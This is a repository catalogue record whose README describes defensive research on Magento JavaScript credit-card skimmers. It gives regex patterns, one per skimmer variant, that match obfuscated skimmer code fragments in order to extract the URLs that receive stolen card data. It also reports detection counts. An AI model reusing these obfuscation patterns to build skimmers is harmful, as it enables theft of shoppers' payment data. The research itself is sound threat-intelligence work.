{"id":27360623,"url":"https://github.com/fhightower/magento-callback-urls","last_synced_at":"2026-01-23T02:38:16.520Z","repository":{"id":83534053,"uuid":"466473956","full_name":"fhightower/magento-callback-URLs","owner":"fhightower","description":null,"archived":false,"fork":false,"pushed_at":"2022-03-05T14:21:48.000Z","size":6,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-20T01:58:19.999Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/fhightower.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-03-05T14:19:40.000Z","updated_at":"2022-03-05T14:24:52.000Z","dependencies_parsed_at":null,"dependency_job_id":"27b29ec4-03c2-444e-9dd7-5156d82966fd","html_url":"https://github.com/fhightower/magento-callback-URLs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/fhightower/magento-callback-URLs","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fhightower%2Fmagento-callback-URLs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fhightower%2Fmagento-callback-URLs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fhightower%2Fmagento-callback-URLs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fhightower%2Fmagento-callback-URLs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/fhightower","download_url":"https://codeload.github.com/fhightower/magento-callback-URLs/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fhightower%2Fmagento-callback-URLs/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28679137,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-23T01:00:35.747Z","status":"online","status_checked_at":"2026-01-23T02:00:08.296Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-04-13T01:09:11.145Z","updated_at":"2026-01-23T02:38:16.514Z","avatar_url":"https://github.com/fhightower.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Javascript Skimmer Callback URLs from Compromised Sites\n\n## Results\nThe URLs listed in indicators.md were parsed from one of the many compromised domains that had one of the Javascript skimmer varieties listed [here](https://github.com/gwillem/magento-malware-collection) running on their website.  These indicators are the URLs to which stolen credit card data is sent once it is skimmed from a website.\n\nThere are two lists of indicators in indicators.md.  It is highly probable or, in some cases, confirmed that the indicators in the first list are malicious.  Indicators in the second list are more likely to be false positives.  I am conducting further analysis of these indicators in ThreatConnect [here](https://app.threatconnect.com/auth/incident/incident.xhtml?incident=2642112).\n\n## Background\nOn Tuesday, October 4, Willem de Groot [reported](https://gwillem.gitlab.io/2016/10/04/how-republicans-send-your-credit-card-to-russia/) that the National Republican Senatorial Committee's website had a Javascript skimmer running on it that was collecting credit card numbers and other information from anyone who purchased an item from the site.  He did some further analysis that uncovered many other domains that had some variation of the Javascript skimmer running on their site.  Willem de Groot created a snippet [here](https://gitlab.com/gwillem/public-snippets/snippets/28813) providing a list of sites compromised with some form of this malware.  I have attempted to identify all of the URLs to which the skimmers submit stolen information.  Continue to the next section to read my methodology.\n\n## Methodology\nShortly after Willem de Groot released the list of sites running a form of the malicious code, I collected the html from each infected domain.  I then went through each of the skimmer variants that could be easily deobfuscated and developed a regex to parse out the callback URL used in each instance of that variant.  Here are the regexes I used to parse callback URLs along with the [name of the variant](https://github.com/gwillem/magento-malware-collection/tree/master/malware/frontend) for which the regex was developed:\n\n```\n{\n    \"amasty.biz\": \"104,116,116,112,46,111,112,101,110,40,34,80,79,83,84,34,44,34,(.*?),34\",\n    \"amasty.biz.js\": \"frrnq#1?--(.*?)#00#0Arpsc\",\n    \"americanwineclub.se.js\": \"\\('\\\\x3c\\\\x73\\\\x63\\\\x72'\\+'\\\\x69\\\\x70\\\\x74 \\\\x74\\\\x79\\\\x70\\\\x65\\\\x3d\\\\x22\\\\x74\\\\x65\\\\x78\\\\x74\\\\x2f\\\\x6a\\\\x61\\\\x76\\\\x61\\\\x73\\\\x63\\\\x72\\\\x69\\\\x70\\\\x74\\\\x22 \\\\x73\\\\x72\\\\x63\\\\x3d\\\\x22(.*?)\\\\x22\\\\x3e\\\\x3c\\\\x2f\\\\x73\\\\x63\\\\x72'\\+'\\\\x69\\\\x70\\\\x74\\\\x3e'\\)\",\n    \"cloudfusion.me.js\": \"\\\"\u003cdiv /\u003e\\\"\\)\\.html\\(\\\"(.*?)\\\"\\)\\.text\\(\\),\",\n    \"gate.php.js\": \"jQuery.ajax\\({url:'(.*?)',crossDomain:false\",\n    \"grelos_v.js\": \"var _0xc188=\\[\\\"(.*?)\\\",\",\n    \"grelos_v_simple.js\": \"Glink:.?'(.*?)',\",\n    \"infopromo.biz.js\": \"http\\.open\\(\\\"POST\\\",\\\"(.*?)\\\",true\\)\",\n    \"jquery-code.su-charcode.js\": \"115,114,99,61,(.*?),34,62,60,47,115,99,114,39,43,39,105,112,116,62,39,41,59,10,125,59\",\n    \"js-save.link.js\": \"\\\\x3C\\\\x73\\\\x63\\\\x72\\\\x69\\\\x70\\\\x74\\\\x20\\\\x73\\\\x72\\\\x63\\\\x3D(.*?)\\\\x3E\\\\x3C\\\\x2F\\\\x73\\\\x63\\\\x72\\\\x69\\\\x70\\\\x74\\\\x3E\",\n    \"mage-cdn.link.js\": \",\\\"(\\\\x68\\\\x74\\\\x74\\\\x70.*?)\\\"\",\n    \"megalith-games.com.js\": \"frm_fill\\(\\\"(.*?)\\\"\\+n\\),\"\n}\n```\n\n\nHere are some statistics on the number of variants I was able to identify from my dataset of 4829 infected html samples:\n\n- amasty.biz: 1\n- amasty.biz.js: 0\n- americanwineclub.se.js: 0\n- cloudfusion.me.js: 13\n- gate.php.js: 15\n- grelos_v.js: 1\n- grelos_v_simple.js: 42\n- infopromo.biz.js: 12\n- jquery-code.su-charcode.js: 3\n- js-save.link.js: 2625\n- mage-cdn.link.js: 88\n- megalith-games.com.js: 3\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffhightower%2Fmagento-callback-urls","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffhightower%2Fmagento-callback-urls","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffhightower%2Fmagento-callback-urls/lists"}